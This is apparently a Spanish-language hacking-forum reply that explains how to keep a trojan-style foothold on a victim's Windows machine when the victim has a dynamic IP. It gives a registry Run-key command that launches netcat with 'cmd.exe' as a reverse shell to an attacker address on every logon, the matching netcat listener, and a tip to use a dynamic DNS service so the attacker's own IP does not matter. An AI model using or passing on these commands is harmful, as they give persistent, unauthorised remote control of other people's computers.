muy bueno gospel.
seguro a mas de alguno le habras resuelto alguna duda.
solo una pequeña observacion.(se me vino a la mente a la hora de leer la parte de "troyanizar").
¿que ocurriria si la victima tiene ip dinamica?
lo mas seguro es que nosostros nos queramos conectar con el server y no lo podremos realizar ya que requerimos la ip de ese equipo
.
pero para todo hay solucion
.
yo sujiriria subirle un netcat y realizar una reverse shell, asi seria el netcat el que se conectaria contigo y no necesitaras saber su ip.
para esto, ya una vez subido el netcat a la victima solo necesitamos agregarle una pequeña entrada al registro, pero como tenemos en estos momentos ya una shell de la victima no sera dificil...
nos dirigimos a la shell de la victima y tecleamos:
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\nc -d -e cmd.exe 10.10.0.156 9090"
(asi seria tomendo en cuenta que el nc esta en el directorio raiz del hdd)
ahora si se ejecutara en cada inicio de sesion...
solo que para esto funcione tendriamos que tener un netcat a la escucha en nuestra maquina y asi nos devolveria shell a la hora en que la victima conecte:
nc -l -p 9090 -d -e cmd.exe
pero ahora se atraviesa otro problema... nosotros tampoco tenemos ip estatica.
pues seria caso de ir a
www.no-ip.com crearnos un dominio y listo
, descargamos el ipduck para conectarnos con la misma ip y ya seremos felices xDDD.
una vez que nos devuelve la shell solo tendriamos que teclear ipconfig y listo, sabremos la ip de la victima.
espero me haya expicado bien
, si no... me avisan
quizas sea algo liado andar haciendo esto pero me recordo mis tiempos de troyanos xDDD
saludos